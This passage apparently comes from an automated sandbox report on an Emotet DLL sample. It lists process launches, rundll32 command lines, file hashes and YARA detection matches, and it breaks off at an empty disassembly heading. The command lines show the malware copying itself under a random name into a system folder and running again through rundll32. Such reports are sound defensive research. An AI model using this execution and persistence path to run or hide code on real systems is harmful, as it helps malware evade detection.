                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.908758600.000000000093A000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 09:34:48
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 09:34:49
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1014042657.000000000303A000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 09:35:01
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 09:35:03
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 09:35:07
                            Start date: 02/12/2021
                            Path: C:\Windows\System32\svchost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
                            Imagebase: 0x7ff6eb840000
                            File size: 51288 bytes
                            MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:35:07
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                            Imagebase: 0x10b0000
                            File size: 434592 bytes
                            MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:35:09
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                            Imagebase: 0x10b0000
                            File size: 434592 bytes
                            MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:35:15
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
                            Imagebase: 0x10b0000
                            File size: 434592 bytes
                            MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:35:16
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                            Imagebase: 0x10b0000
                            File size: 434592 bytes
                            MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:35:33
                            Start date: 02/12/2021
                            Path: C:\Windows\System32\svchost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase: 0x7ff6eb840000
                            File size: 51288 bytes
                            MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:35:55
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, Author: Joe Security

                            General

                            Start time: 09:36:09
                            Start date: 02/12/2021
                            Path: C:\Windows\System32\svchost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase: 0x7ff6eb840000
                            File size: 51288 bytes
                            MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:36:32
                            Start date: 02/12/2021
                            Path: C:\Windows\System32\svchost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase: 0x7ff6eb840000
                            File size: 51288 bytes
                            MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            General

                            Start time: 09:36:49
                            Start date: 02/12/2021
                            Path: C:\Windows\System32\svchost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase: 0x7ff6eb840000
                            File size: 51288 bytes
                            MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language

                            Disassembly

                            Code Analysis